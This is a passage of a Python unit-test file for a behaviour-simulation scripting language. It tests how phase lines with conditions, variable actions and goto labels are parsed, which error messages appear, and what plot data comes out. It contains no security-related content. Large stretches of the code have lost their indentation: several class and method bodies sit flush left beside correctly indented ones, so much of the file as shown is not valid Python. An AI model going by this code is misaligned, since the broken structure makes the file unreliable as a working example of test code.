            parse(text, 'phase_label')

    def test_multiple_actions_error4(self):
        """An unconditional goto cannot be followed by further branches."""
        text = '''
        behaviors : b1, b2
        stimulus_elements : e1, e2, e3
        @PHASE phase_label stop:e1=100
        S | x1 = 0, x2 = 0, A
        A e1 | B | C
        B e2 | A
        C e3 | A
        '''
        msg = "Error on line 7: The unconditional goto row label 'B' cannot be continued."
        with self.assertRaisesMsg(msg):
            parse(text, 'phase_label')

    # b1==5 should raise error
    # def test_multiple_actions_error5(self):
    #     text = '''
    #     behaviors : b1, b2
    #     stimulus_elements : e1, e2, e3
    #     @PHASE phase_label stop:e1=100
    #     S | x1 = 0, x2 = 0, A
    #     A e1 | b1=5: x1:1, x2:2, B | C  # Should give error
    #     B e2 | A
    #     C e3 | A
    #     '''
    #     phase = parse(text, 'phase_label')
class TestMultipleActions(LsTestCase):
def setUp(self):
    # No per-test fixtures are needed for this class.
    pass
def tearDown(self):
    # Close any matplotlib figures a test may have opened.
    plt.close('all')
def test_small1(self):
    """Unconditional multi-actions (p1:1, p2:2) run before the goto."""
    text = '''
    behaviors : b1, b2
    stimulus_elements : e1, e2
    mechanism : sr
    @PHASE phase_label stop:e1=10
    A e1 | p1:1, p2:2, B
    B e2 | A
    '''
    phase = parse(text, 'phase_label')
    stimulus = phase.next_stimulus(None)[0]
    self.assertEqual(stimulus, {'e1': 1})
    stimulus = phase.next_stimulus('b2')[0]
    self.assertEqual(stimulus, {'e2': 1})
    self.assertEqual(phase.local_variables.values, {'p1': 1, 'p2': 2})
def test_small2(self):
    """Actions guarded by a response condition (b1) run when b1 occurs."""
    text = '''
    behaviors : b1
    stimulus_elements : e1, e2
    mechanism : sr
    @PHASE phase_label stop:e1=10
    A e1 | b1: x1=1, x2=2, B | A
    B e2 | A
    '''
    phase = parse(text, 'phase_label')
    stimulus = phase.next_stimulus(None)[0]
    self.assertEqual(stimulus, {'e1': 1})
    stimulus = phase.next_stimulus('b1')[0]
    self.assertEqual(stimulus, {'e2': 1})
    self.assertEqual(phase.local_variables.values, {'x1': 1, 'x2': 2})
def test_small3(self):
text = '''
behaviors : b1, b2
stimulus_elements : e1, e2
mechanism : sr
@PHASE phase_label stop:e1=10
A e1 | count(e2)==3: x1=1, x2=2, A | B
B e2 | A
'''
phase = parse(text, 'phase_label')
stimulus = phase.next_stimulus(None)[0]
self.assertEqual(stimulus, {'e1': 1})
self.assertEqual(phase.local_variables.values, dict())
stimulus = phase.next_stimulus('b2')[0]
self.assertEqual(stimulus, {'e2': 1})
self.assertEqual(phase.local_variables.values, dict())
stimulus = phase.next_stimulus('b2')[0]
self.assertEqual(stimulus, {'e1': 1})
self.assertEqual(phase.local_variables.values, dict())
stimulus = phase.next_stimulus('b1')[0]
self.assertEqual(stimulus, {'e2': 1})
self.assertEqual(phase.local_variables.values, dict())
stimulus = phase.next_stimulus('b2')[0]
self.assertEqual(stimulus, {'e1': 1})
self.assertEqual(phase.local_variables.values, dict())
stimulus = phase.next_stimulus('b1')[0]
self.assertEqual(stimulus, {'e2': 1})
self.assertEqual(phase.local_variables.values, dict())
stimulus = phase.next_stimulus('b2')[0]
self.assertEqual(stimulus, {'e1': 1})
self.assertEqual(phase.local_variables.values, dict())
stimulus = phase.next_stimulus('b2')[0]
self.assertEqual(stimulus, {'e1': 1})
self.assertEqual(phase.local_variables.values, {'x1': 1, 'x2': 2})
def test_split_with_function_comma1(self):
text = '''
behaviors : b1, b2
stimulus_elements : e1, e2
mechanism : sr
@PHASE phase_label stop:e1=10
A e1 | x1:1, x2:rand(1,3), count(b1)=5: x2:42, B | C
B e2 | A
C e1 | A
'''
phase = parse(text, 'phase_label')
stimulus = phase.next_stimulus(None)[0]
self.assertEqual(stimulus, {'e1': 1})
self.assertEqual(phase.local_variables.values, dict())
stimulus = phase.next_stimulus('b1')[0]
self.assertEqual(stimulus, {'e1': 1})
self.assertTrue('x1' in phase.local_variables.values)
self.assertTrue('x2' in phase.local_variables.values)
stimulus = phase.next_stimulus('b2')[0]
self.assertEqual(stimulus, {'e1': 1})
stimulus = phase.next_stimulus('b1')[0]
self.assertEqual(stimulus, {'e1': 1})
stimulus = phase.next_stimulus('b1')[0]
self.assertEqual(stimulus, {'e1': 1})
stimulus = phase.next_stimulus('b1')[0]
self.assertEqual(stimulus, {'e1': 1})
stimulus = phase.next_stimulus('b1')[0]
self.assertEqual(stimulus, {'e1': 1})
stimulus = phase.next_stimulus('b2')[0]
self.assertEqual(stimulus, {'e2': 1})
self.assertEqual(phase.local_variables.values, {'x1': 1, 'x2': 42})
def test_split_with_function_comma2(self):
text = '''
behaviors : b1, b2
stimulus_elements : e1, e2, e3
mechanism : sr
@PHASE phase_label stop:e1=10
A e1 | x1:1, x2:choice(11,12), count(b1)=5: x2:choice([5,6],[1,2]), B | C
B e2 | A
C e3 | x3:choice(20,22,24), A
'''
phase = parse(text, 'phase_label')
stimulus = phase.next_stimulus(None)[0]
self.assertEqual(stimulus, {'e1': 1})
self.assertEqual(phase.local_variables.values, dict())
stimulus = phase.next_stimulus('b1')[0]
self.assertEqual(stimulus, {'e3': 1})
self.assertTrue('x1' in phase.local_variables.values)
self.assertTrue('x2' in phase.local_variables.values)
self.assertTrue('x3' not in phase.local_variables.values)
stimulus = phase.next_stimulus('b2')[0]
self.assertEqual(stimulus, {'e1': 1})
self.assertEqual(phase.local_variables.values['x1'], 1)
self.assertTrue(phase.local_variables.values['x2'] in (11, 12))
self.assertTrue(phase.local_variables.values['x3'] in (20, 22, 24))
stimulus = phase.next_stimulus('b1')[0]
self.assertEqual(stimulus, {'e3': 1})
stimulus = phase.next_stimulus('b1')[0]
self.assertEqual(stimulus, {'e1': 1})
stimulus = phase.next_stimulus('b1')[0]
self.assertEqual(stimulus, {'e3': 1})
stimulus = phase.next_stimulus('b1')[0]
self.assertEqual(stimulus, {'e1': 1})
stimulus = phase.next_stimulus('b2')[0]
self.assertEqual(stimulus, {'e2': 1})
self.assertEqual(phase.local_variables.values['x1'], 1)
self.assertTrue(phase.local_variables.values['x2'] in (5, 6))
self.assertTrue(phase.local_variables.values['x3'] in (20, 22, 24))
def test_prob_goto_without_else(self):
text = '''
n_subjects : 1
behaviors : b1, b2
stimulus_elements : e1, e2
mechanism : sr
@PHASE phase_label stop:e1=10
A e1 | x1:1, x2:rand(1,3), b1=5: x:10, B(0.5),C(0.1) | C
B e2 | A
C e1 | A
@run phase_label runlabel:foo
'''
run(text)
def test_set_and_use_variable_on_same_line1(self):
text = '''
n_subjects : 1
behaviors : b1, b2
stimulus_elements : e1, e2
mechanism : sr
@PHASE phase_label stop:e1=10
A e1 | p1:1, p2:2, p1=42: A | B
B e2 | A
@run phase_label runlabel:foo
'''
script_obj, script_output = run(text)
history = script_output.run_outputs['foo'].output_subjects[0].history
self.assertEqual(history[::2], ['e1', 'e2'] * 9 + ['e1'])
def test_set_and_use_variable_on_same_line2(self):
text = '''
n_subjects : 1
behaviors : b1, b2
stimulus_elements : e1, e2
mechanism : sr
@PHASE phase_label stop:e1=10
A e1 | p1:142, p2:2, p1=142: A | B
B e2 | A
@run phase_label runlabel:foo
'''
script_obj, script_output = run(text)
history = script_output.run_outputs['foo'].output_subjects[0].history
self.assertEqual(history[::2], ['e1'] * 10)
def test_response_in_condition(self):
text = '''
behaviors : b1, b2
stimulus_elements : e1, e2
mechanism : sr
@PHASE phase_label stop:e2=10
A e1 | b1: A | B
B e2 | A
'''
phase = parse(text, 'phase_label')
stimulus = phase.next_stimulus(None)[0]
self.assertEqual(stimulus, {'e1': 1})
stimulus = phase.next_stimulus('b1')[0]
self.assertEqual(stimulus, {'e1': 1})
stimulus = phase.next_stimulus('b1')[0]
self.assertEqual(stimulus, {'e1': 1})
stimulus = phase.next_stimulus('b2')[0]
self.assertEqual(stimulus, {'e2': 1})
# text = '''
# behaviors : b1, b2
# stimulus_elements : e1, e2
# mechanism : sr
# @PHASE phase_label stop:e2=10
# A e1 | b1 and 1==1: A | B
# B e2 | A
# '''
# phase = parse(text, 'phase_label')
# stimulus = phase.next_stimulus(None)[0]
# self.assertTrue(stimulus == {'e1': 1})
# stimulus = phase.next_stimulus('b1')[0]
# self.assertTrue(stimulus == {'e1': 1})
# stimulus = phase.next_stimulus('b1')[0]
# self.assertTrue(stimulus == {'e1': 1})
# stimulus = phase.next_stimulus('b2')[0]
# self.assertTrue(stimulus == {'e2': 1})
text = '''
behaviors : b1, b2, b3
stimulus_elements : e1, e2
mechanism : sr
@PHASE phase_label stop:e2=10
A e1 | b1 or b2: A | B
B e2 | A
'''
phase = parse(text, 'phase_label')
stimulus = phase.next_stimulus(None)[0]
self.assertEqual(stimulus, {'e1': 1})
for i in range(100):
response = choice(['b1', 'b2'])
stimulus = phase.next_stimulus(response)[0]
self.assertEqual(stimulus, {'e1': 1})
stimulus = phase.next_stimulus('b3')[0]
self.assertEqual(stimulus, {'e2': 1})
text = '''
behaviors : b1, b2, b3
stimulus_elements : e1, e2
mechanism : sr
@PHASE phase_label stop:e2=10
A e1 | (b1 or b2) and count(e2)==0: A | B
B e2 | A
'''
phase = parse(text, 'phase_label')
stimulus = phase.next_stimulus(None)[0]
self.assertEqual(stimulus, {'e1': 1})
for i in range(100):
response = choice(['b1', 'b2'])
stimulus = phase.next_stimulus(response)[0]
self.assertEqual(stimulus, {'e1': 1})
stimulus = phase.next_stimulus('b3')[0]
self.assertEqual(stimulus, {'e2': 1})
text = '''
behaviors : b1, b2, b3
stimulus_elements : e1, e2
mechanism : sr
@PHASE phase_label stop:e2=10
A e1 | ( b1 or (b2) ) and count(e2)==0: A | B
B e2 | A
'''
phase = parse(text, 'phase_label')
stimulus = phase.next_stimulus(None)[0]
self.assertEqual(stimulus, {'e1': 1})
for i in range(100):
response = choice(['b1', 'b2'])
stimulus = phase.next_stimulus(response)[0]
self.assertEqual(stimulus, {'e1': 1})
stimulus = phase.next_stimulus('b3')[0]
self.assertEqual(stimulus, {'e2': 1})
text = '''
behaviors : b1, b2, b3
stimulus_elements : e1, e2
mechanism : sr
@PHASE phase_label stop:e2=10
A e1 | ( b1 or (b2 and [1,2,3]==[1,2,3]) ) and count(e2)==0: A | B
B e2 | A
'''
phase = parse(text, 'phase_label')
stimulus = phase.next_stimulus(None)[0]
self.assertEqual(stimulus, {'e1': 1})
for i in range(100):
response = choice(['b1', 'b2'])
stimulus = phase.next_stimulus(response)[0]
self.assertEqual(stimulus, {'e1': 1})
stimulus = phase.next_stimulus('b3')[0]
self.assertEqual(stimulus, {'e2': 1})
text = '''
behaviors : b1, b2, b3
stimulus_elements : e1, e2
mechanism : sr
@PHASE phase_label stop:e1=101
A e1 | ([1,2,3]==[1,2,3]): A | B
B e2 | A
'''
phase = parse(text, 'phase_label')
stimulus = phase.next_stimulus(None)[0]
self.assertEqual(stimulus, {'e1': 1})
for i in range(100):
response = choice(['b1', 'b2'])
stimulus = phase.next_stimulus(response)[0]
self.assertEqual(stimulus, {'e1': 1})
stimulus = phase.next_stimulus('b3')[0]
self.assertEqual(stimulus, None)
text = '''
behaviors : b1, b2, b3
stimulus_elements : e1, e2
mechanism : sr
@PHASE phase_label stop:e1=101
A e1 | b1 and count_line(b2)>0: A | B
B e2 | A
'''
phase = parse(text, 'phase_label')
stimulus = phase.next_stimulus(None)[0]
self.assertEqual(stimulus, {'e1': 1})
for i in range(100):
response = choice(['b1', 'b2', 'b3'])
stimulus = phase.next_stimulus(response)[0]
if i % 2:
self.assertEqual(stimulus, {'e1': 1})
else:
self.assertEqual(stimulus, {'e2': 1})
stimulus = phase.next_stimulus('b3')[0]
self.assertEqual(stimulus, {'e2': 1})
text = '''
behaviors : b1, b2, b3
stimulus_elements : e1, e2
mechanism : sr
@PHASE phase_label stop:e1=101
A e1 | b1 and b2>0: A | B
B e2 | A
'''
phase = parse(text, 'phase_label')
stimulus = phase.next_stimulus(None)[0]
self.assertEqual(stimulus, {'e1': 1})
for i in range(100):
response = choice(['b1', 'b2', 'b3'])
stimulus = phase.next_stimulus(response)[0]
if i % 2:
self.assertEqual(stimulus, {'e1': 1})
else:
self.assertEqual(stimulus, {'e2': 1})
stimulus = phase.next_stimulus('b3')[0]
self.assertEqual(stimulus, {'e2': 1})
text = '''
behaviors : b1, b2, b3
stimulus_elements : e1, e2
mechanism : sr
@PHASE phase_label stop:e1=101
A e1 | b1 and b2: A | B
B e2 | A
'''
phase = parse(text, 'phase_label')
stimulus = phase.next_stimulus(None)[0]
self.assertEqual(stimulus, {'e1': 1})
for i in range(100):
response = choice(['b1', 'b2', 'b3'])
stimulus = phase.next_stimulus(response)[0]
if i % 2:
self.assertEqual(stimulus, {'e1': 1})
else:
self.assertEqual(stimulus, {'e2': 1})
stimulus = phase.next_stimulus('b3')[0]
self.assertEqual(stimulus, {'e2': 1})
text = '''
behaviors : b1, b2, b3
stimulus_elements : e1, e2
mechanism : sr
@PHASE phase_label stop:e1=101
A e1 | [1,2,3]==[1,2,3]: A | B
B e2 | A
'''
msg = "Error on line 7: Unknown action '[1'."
with self.assertRaisesMsg(msg):
parse(text, 'phase_label')
text = '''
behaviors : b1, b2, b3
stimulus_elements : e1, e2
mechanism : sr
@PHASE phase_label stop:e2=10
A e1 | ( b1 or (b2 or {'a':1}=={'a':1}) ) : A | B
B e2 | A
'''
msg = "Error on line 7: Invalid statement '( b1 or (b2 or {'a':1}=={'a':1}) ) : A'."
with self.assertRaisesMsg(msg):
parse(text, 'phase_label')
def test_conditional_and_unconditional_actions(self):
params = '''
behaviors : b1, b2, b3
stimulus_elements : e0, e1, e2, e3
mechanism : sr
'''
text = params + '''
@PHASE phase_label stop:False
S | x1 = 0, x2 = 0, E0
E0 e0 | x1=1, x2=2, b1: x1=x1+1, x2=x2+1, E1 | x1 = x1+2, x2=x2+2, b2: x1=x1+1, E2 | x1=33, E3
E1 e1 | E0
E2 e2 | E0
E3 e3 | E0
'''
phase = parse(text, 'phase_label')
stimulus = phase.next_stimulus(None)[0]
self.assertEqual(stimulus, {'e0': 1})
self.assertEqual(phase.local_variables.values, {'x1': 0, 'x2': 0})
for _ in range(42):
stimulus = phase.next_stimulus('b1')[0]
self.assertEqual(stimulus, {'e1': 1})
self.assertEqual(phase.local_variables.values, {'x1': 2, 'x2': 3})
stimulus = phase.next_stimulus(choice(['b1', 'b2', 'b3']))[0]
self.assertEqual(stimulus, {'e0': 1})
self.assertEqual(phase.local_variables.values, {'x1': 2, 'x2': 3})
for _ in range(42):
stimulus = phase.next_stimulus('b2')[0]
self.assertEqual(stimulus, {'e2': 1})
self.assertEqual(phase.local_variables.values, {'x1': 4, 'x2': 4})
stimulus = phase.next_stimulus(choice(['b1', 'b2', 'b3']))[0]
self.assertEqual(stimulus, {'e0': 1})
self.assertEqual(phase.local_variables.values, {'x1': 4, 'x2': 4})
for _ in range(42):
stimulus = phase.next_stimulus('b3')[0]
self.assertEqual(stimulus, {'e3': 1})
self.assertEqual(phase.local_variables.values, {'x1': 33, 'x2': 4})
stimulus = phase.next_stimulus(choice(['b1', 'b2', 'b3']))[0]
self.assertEqual(stimulus, {'e0': 1})
self.assertEqual(phase.local_variables.values, {'x1': 33, 'x2': 4})
def test_conditional_and_unconditional_actions_exceptions(self):
params = '''
behaviors : b1, b2, b3
stimulus_elements : e0, e1, e2, e3
mechanism : sr
'''
text = params + '''
@PHASE phase_label stop:False
S | x1 = 0, x2 = 0, E0
E0 e0 | x1==0: x2=0, b1: x1=x1+1, x2=x2+1, E1 | x1 = x1+2, x2=x2+2, b2: x1=x1+1, E2 | x1=33, E3
E1 e1 | E0
E2 e2 | E0
E3 e3 | E0
'''
msg = "Error on line 9: Multiple conditions ('x1==0' and 'b1') found in 'x1==0: x2=0, b1: x1=x1+1, x2=x2+1, E1'."
with self.assertRaisesMsg(msg):
parse(text, 'phase_label')
text = params + '''
@PHASE phase_label stop:False
S | x1 = 0, x2 = 0, E0
E0 e0 | x1==0: x2:0, b1: x1=x1+1, x2:x2+1, E1 | x1 = x1+2, x2=x2+2, b2: x1=x1+1, E2 | x1=33, E3
E1 e1 | E0
E2 e2 | E0
E3 e3 | E0
'''
msg = "Error on line 9: Multiple conditions ('x1==0' and 'b1') found in 'x1==0: x2:0, b1: x1=x1+1, x2:x2+1, E1'."
with self.assertRaisesMsg(msg):
parse(text, 'phase_label')
text = params + '''
@PHASE phase_label stop:False
S | x1 = 0, x2 = 0, E0
E0 e0 | x1==0: x2:0, b1: x1:x1+1, x2:x2+1, E1 | x1 = x1+2, x2=x2+2, b2: x1=x1+1, E2 | x1=33, E3
E1 e1 | E0
E2 e2 | E0
E3 e3 | E0
'''
msg = "Error on line 9: Multiple conditions ('x1==0' and 'b1') found in 'x1==0: x2:0, b1: x1:x1+1, x2:x2+1, E1'."
with self.assertRaisesMsg(msg):
parse(text, 'phase_label')
text = params + '''
@PHASE phase_label stop:False
S | x1 = 0, x2 = 0, E0
E0 e0 | x1=0, x2=0, E1, x1=x1+1 | E0
E1 e1 | E0
E2 e2 | E0
E3 e3 | E0
'''
msg = "Error on line 9: Row label(s) must be the last action(s). Found 'x1=x1+1' after row-label."
with self.assertRaisesMsg(msg):
parse(text, 'phase_label')
text = params + '''
@PHASE phase_label stop:False
S | x1 = 0, x2 = 0, E0
E0 e0 | x1=0, x2=0, E1, x1=x1+1, E2 | E0
E1 e1 | E0
E2 e2 | E0
E3 e3 | E0
'''
msg = "Error on line 9: Row label(s) must be the last action(s). Found 'x1=x1+1' after row-label."
with self.assertRaisesMsg(msg):
parse(text, 'phase_label')
text = params + '''
@PHASE phase_label stop:False
S | x1 = 0, x2 = 0, E0
E0 e0 | b1: x1=0, x2=0, E1, x1=x1+1, E2 | E0
E1 e1 | E0
E2 e2 | E0
E3 e3 | E0
'''
msg = "Error on line 9: Row label(s) must be the last action(s). Found 'x1=x1+1' after row-label."
with self.assertRaisesMsg(msg):
parse(text, 'phase_label')
text = params + '''
@PHASE phase_label stop:False
S | x1 = 0, x2 = 0, E0
E0 e0 | x1=0, x2=0, E1 | E0
E1 e1 | E0
E2 e2 | E0
E3 e3 | E0
'''
msg = "Error on line 9: The unconditional goto row label 'E1' cannot be continued."
with self.assertRaisesMsg(msg):
parse(text, 'phase_label')
text = params + '''
@PHASE phase_label stop:False
S | x1 = 0, x2 = 0, E0
E0 e0 | x1=0, x2=0, E1, E2, E3 | E0
E1 e1 | E0
E2 e2 | E0
E3 e3 | E0
'''
msg = "Error on line 9: The unconditional goto row label 'E1,E2,E3' cannot be continued."
with self.assertRaisesMsg(msg):
parse(text, 'phase_label')
text = params + '''
@PHASE phase_label stop:False
S | x1 = 0, x2 = 0, E0
E0 e0 | x1=0, x2=0, E1, E2, E3
E1 e1 | E0
E2 e2 | E0
E3 e3 | E0
'''
msg = "Invalid condition 'E1,E2,E3'."
with self.assertRaisesMsg(msg):
parse(text, 'phase_label')
text = params + '''
@PHASE phase_label stop:False
S | x1 = 0, x2 = 0, E0
E0 e0 | x1=0, x2=0, x1=x1+1 | E0
E1 e1 | E0
E2 e2 | E0
E3 e3 | E0
'''
msg = "Error on line 9: Last action must be a row label, found 'x1=x1+1'."
with self.assertRaisesMsg(msg):
parse(text, 'phase_label')
text = params + '''
@PHASE phase_label stop:False
S | x1 = 0, x2 = 0, E0
E0 e0 | x1=0, x2=0, E1, x1==5: E2 | E0
E1 e1 | E0
E2 e2 | E0
E3 e3 | E0
'''
msg = "Error on line 9: Found condition 'x1==5' after row label 'E1'."
with self.assertRaisesMsg(msg):
parse(text, 'phase_label')
text = params + '''
@PHASE phase_label stop:False
S | x1 = 0, x2 = 0, E0
E0 e0 | x1=0, x2=0, E1(0.1), x1==5: E2(0.9) | E0
E1 e1 | E0
E2 e2 | E0
E3 e3 | E0
'''
msg = "Error on line 9: Found condition 'x1==5' after row label 'E1(0.1)'."
with self.assertRaisesMsg(msg):
parse(text, 'phase_label')
def test_exceptions(self):
params = '''
behaviors : b1, b2
stimulus_elements : e1, e2
mechanism : sr
'''
text = params + '''
@PHASE phase_label stop:e1=10
A e1 | p1:1, p2:2, B,A(1.1)
B e2 | A
'''
msg = "Error on line 8: Invalid condition 'B,A(1.1)'."
with self.assertRaisesMsg(msg):
parse(text, 'phase_label')
text = params + '''
@PHASE phase_label stop:e1=10
A e1 | p1:1, p2:2, B(1.1),A(1.1)
B e2 | A
'''
msg = "Error on line 8: Invalid condition 'B(1.1),A(1.1)'. Expected a probability, got '1.1'."
with self.assertRaisesMsg(msg):
parse(text, 'phase_label')
text = params + '''
@PHASE phase_label stop:e1=10
A e1 | b1: x1:1, x2:2, B # Missing else
B e2 | A
@run phase_label
'''
msg = "No condition in 'b1: x1:1, x2:2, B' was met for response 'b2'."
with self.assertRaisesMsg(msg):
run(text)
text = params + '''
@PHASE phase_label stop:e1=10
A e1 | b1 b2 = x3 x4: x1:1, x2:2, B
B e2 | A
@run phase_label
'''
msg = "Error on line 8: Error in expression 'b1 b2 == x3 x4': invalid syntax."
with self.assertRaisesMsg(msg):
run(text)
text = params + '''
@PHASE phase_label stop:e1=10
A e1 | B | C
B e2 | A
C e1 | A
'''
msg = "Error on line 8: The unconditional goto row label 'B' cannot be continued."
with self.assertRaisesMsg(msg):
parse(text, 'phase_label')
text = params + '''
@PHASE phase_label stop:e1=10
A e1 | x1:1, b1&5: x2:2, B | C
B e2 | A
C e1 | A
@run phase_label
'''
msg = "Error on line 8: Condition 'b1&5' is not a boolean expression."
with self.assertRaisesMsg(msg):
run(text)
text = params + '''
@PHASE phase_label stop:e1=10
A e1 | x1::1, x2:2, B
B e2 | A
'''
msg = "Error on line 8: Invalid statement 'x1::1'."
with self.assertRaisesMsg(msg):
parse(text, 'phase_label')
text = params + '''
@PHASE phase_label stop:e1=10
A e1 | foo:bar:1, x2:2, B
B e2 | A
'''
msg = "Error on line 8: Invalid statement 'foo:bar:1'."
with self.assertRaisesMsg(msg):
parse(text, 'phase_label')
text = params + '''
@PHASE phase_label stop:e1=10
A e1 | foo:bar:baz:1, x2:2, B
B e2 | A
'''
msg = "Error on line 8: Invalid statement 'foo:bar:baz:1'."
with self.assertRaisesMsg(msg):
parse(text, 'phase_label')
text = params + '''
@PHASE phase_label stop:e1=10
A | b1:B | A
B e2 | A
'''
msg = "Error on line 8: Condition on help line cannot depend on response."
with self.assertRaisesMsg(msg):
parse(text, 'phase_label')
text = params + '''
@PHASE phase_label stop:e1=10
S | x:0, A
A | b1+cos(x)==2 and x==0:B | A
B e2 | A
'''
msg = "Error on line 9: Condition on help line cannot depend on response."
with self.assertRaisesMsg(msg):
parse(text, 'phase_label')
text = params + '''
@PHASE phase_label stop:e1=10
S | x:0, A
A | count(b1)==2 or x==0:B | A # Is actually ok, but we should
# phase out count(), so never mind
B e2 | A
'''
msg = "Error on line 9: Condition on help line cannot depend on response."
with self.assertRaisesMsg(msg):
parse(text, 'phase_label')
text = params + '''
@PHASE phase_label stop:e1=10
A | x1:1, x2:2, B, x3:3 | A
B e2 | A
'''
msg = "Error on line 8: Row label(s) must be the last action(s). Found 'x3:3' after row-label."
with self.assertRaisesMsg(msg):
parse(text, 'phase_label')
text = params + '''
@PHASE phase_label stop:e1=10
A | x0:0, x1:1, x2:2, x3:3 | A
B e2 | A
'''
msg = "Error on line 8: Last action must be a row label, found 'x3:3'."
with self.assertRaisesMsg(msg):
parse(text, 'phase_label')
text = params + '''
@PHASE phase_label stop:e1=10
A e1 | b1=6: x1:1, x2:2, x3:3
B e2 | A
'''
msg = "Last action must be a row label, found 'x3:3'."
with self.assertRaisesMsg(msg):
parse(text, 'phase_label')
text = params + '''
@PHASE phase_label stop:e1=10
A | e1=1: 1x:1, B
B e2 | A
'''
msg = "Error on line 8: Variable name '1x' is not a valid identifier."
with self.assertRaisesMsg(msg):
parse(text, 'phase_label')
text = params + '''
@PHASE phase_label stop:e1=10
A | x==2:1, B
B e2 | A
'''
msg = "Unknown action '1'."
with self.assertRaisesMsg(msg):
parse(text, 'phase_label')
text = params + '''
@PHASE phase_label stop:e1=10
A e1 | b1:1, B
B e2 | A
'''
msg = "Error on line 8: Unknown action '1'."
with self.assertRaisesMsg(msg):
parse(text, 'phase_label')
text = params + '''
@PHASE phase_label stop:e1=10
A e1 | e2:1, B
B e2 | A
'''
msg = "Error on line 8: Variable name 'e2' equals a stimulus element name."
with self.assertRaisesMsg(msg):
parse(text, 'phase_label')
text = params + '''
@variables glob:0
@PHASE phase_label stop:e1=10
A e1 | x1:1, glob:1, x2:2, B
B e2 | A
'''
msg = "Error on line 9: Cannot modify global variable inside a phase."
with self.assertRaisesMsg(msg):
parse(text, 'phase_label')
text = params + '''
@variables glob:0
@PHASE phase_label stop:e1=10
A e1 | x1:1, count_reset(foo), x2:2, B
B e2 | A
'''
msg = "Error on line 9: Unknown event 'foo' in count_reset."
with self.assertRaisesMsg(msg):
parse(text, 'phase_label')
text = params + '''
@variables glob:0
@PHASE phase_label stop:e1=10
A e1 | x1:1, blaps, x2:2, B
B e2 | A
'''
msg = "Error on line 9: Unknown action 'blaps'."
with self.assertRaisesMsg(msg):
parse(text, 'phase_label')
text = params + '''
@variables glob:0
@PHASE phase_label stop:e1=10
A e1 | x1:1, x2, x3:3, B
B e2 | A
'''
msg = "Error on line 9: Unknown action 'x2'."
with self.assertRaisesMsg(msg):
parse(text, 'phase_label')
text = params + '''
@variables glob:0
@PHASE phase_label stop:e1=10
A e1 | x1:1, e2, x3:3, B
B e2 | A
'''
msg = "Error on line 9: Unknown action 'e2'."
with self.assertRaisesMsg(msg):
parse(text, 'phase_label')
text = params + '''
@variables glob:0
@PHASE phase_label stop:e1=10
A e1 | x1:1, b2, x3:3, B
B e2 | A
'''
msg = "Error on line 9: Unknown action 'b2'."
with self.assertRaisesMsg(msg):
parse(text, 'phase_label')
text = params + '''
behaviors = b1
@PHASE phase_label stop:e1=10
A e1 | x1:1, x2:rand(1,3), b1=5: x:10, B(0.5),C(0.5)
B e2 | A
C e1 | A
@run phase_label
'''
msg = "No condition in 'x1:1, x2:rand(1,3), b1=5: x:10, B(0.5),C(0.5)' was met for response 'b1'."
with self.assertRaisesMsg(msg):
run(text)
text = params + '''
behaviors = b1
@PHASE phase_label stop:e1=10
A e1 | x1:1, x2:rand(1,3), b1 = 5: x:10, B(0.5),C(0.5)
B e2 | A
C e1 | A
@run phase_label
'''
msg = "No condition in 'x1:1, x2:rand(1,3), b1 = 5: x:10, B(0.5),C(0.5)' was met for response 'b1'."
with self.assertRaisesMsg(msg):
run(text)
text = params + '''
behaviors = b1
@PHASE phase_label stop:e1=10
A e1 | x1:1, x2:rand(1,3), b1 == 5: x:10, B(0.5),C(0.5)
B e2 | A
C e1 | A
@run phase_label
'''
msg = "No condition in 'x1:1, x2:rand(1,3), b1 == 5: x:10, B(0.5),C(0.5)' was met for response 'b1'."
with self.assertRaisesMsg(msg):
run(text)
class TestWithPlots(LsTestCase):
    """Tests that run complete scripts with @nplot output and check the plotted data.

    Each script uses a single 'NT' phase line so that stop conditions can refer
    either to the stimulus 's' or to the phase line label 'NT'.
    """

    def setUp(self):
        pass

    def tearDown(self):
        # Close figures created by @nplot.
        plt.close('all')

    def test_stopcond_stimulus(self):
        """Stop condition on a stimulus element; default x-scale counts all steps."""
        text = '''
mechanism: sr
stimulus_elements: s
behaviors: b
@phase phase1 stop:s=2
NT s | NT
@run phase1
@nplot s
'''
        run(text)
        plot_data = get_plot_data()
        ns = plot_data
        self.assertEqual(ns['x'], [0, 1, 2, 3, 4])
        self.assertEqual(ns['y'], [0, 1, 1, 2, 2])

    def test_stopcond_phase_line_label(self):
        """Stop condition on a phase line label gives the same data as on the stimulus."""
        text = '''
mechanism: sr
stimulus_elements: s
behaviors: b
@phase phase1 stop:NT=2
NT s | NT
@run phase1
@nplot s
'''
        run(text)
        plot_data = get_plot_data()
        ns = plot_data
        self.assertEqual(ns['x'], [0, 1, 2, 3, 4])
        self.assertEqual(ns['y'], [0, 1, 1, 2, 2])

    def test_stopcond_stimulus_with_xscale(self):
        """xscale on the stimulus compresses the x-axis to stimulus presentations."""
        text = '''
mechanism: sr
stimulus_elements: s
behaviors: b
@phase phase1 stop:s=2
NT s | NT
@run phase1
xscale: s
@nplot s
'''
        run(text)
        plot_data = get_plot_data()
        ns = plot_data
        self.assertEqual(ns['x'], [0, 1, 2])
        self.assertEqual(ns['y'], [0, 1, 2])

    def test_stopcond_stimulus_with_phases(self):
        """The 'phases' filter restricts @nplot data to the selected phase."""
        text = '''
mechanism: sr
stimulus_elements: s
behaviors: b
@phase phase1 stop:s=2
NT s | NT
@phase phase2 stop:s=2
NT s | NT
@run phase1, phase2
phases: phase2
@nplot s
'''
        run(text)
        plot_data = get_plot_data()
        ns = plot_data
        self.assertEqual(ns['x'], [0, 1, 2, 3, 4])
        self.assertEqual(ns['y'], [0, 1, 1, 2, 2])

    def test_stopcond_phase_line_label_with_xscale(self):
        """A phase line label is not a valid xscale for @nplot/@nexport."""
        text = '''
mechanism: sr
stimulus_elements: s
behaviors: b
@phase phase1 stop:NT=2
NT s | NT
@run phase1
xscale: NT
@nplot s
'''
        msg = "xscale cannot be a phase line label in @nplot/@nexport."
        with self.assertRaisesMsg(msg):
            run(text)
class TestExceptions(LsTestCase):
def setUp(self):
    # No per-test fixtures needed.
    pass
def test_no_label(self):
    """A @PHASE directive without a label (and stop condition) must raise."""
    text = '''
@PHASE
'''
    msg = "@PHASE line must have the form '@PHASE label stop:condition'."
    with self.assertRaisesMsg(msg):
        parse(text, '_')
def test_wrong_stopcond(self):
    """Invalid stop conditions parse fine but fail when first evaluated."""
    # Unknown name in the stop condition.
    text = '''
stimulus_elements: e1, e2
behaviors: b1, b2
@PHASE phase_label stop:e11=10
L1 e1 | L2
L2 e2 | L1
'''
    phase = parse(text, 'phase_label')
    msg = "Unknown variable 'e11'."
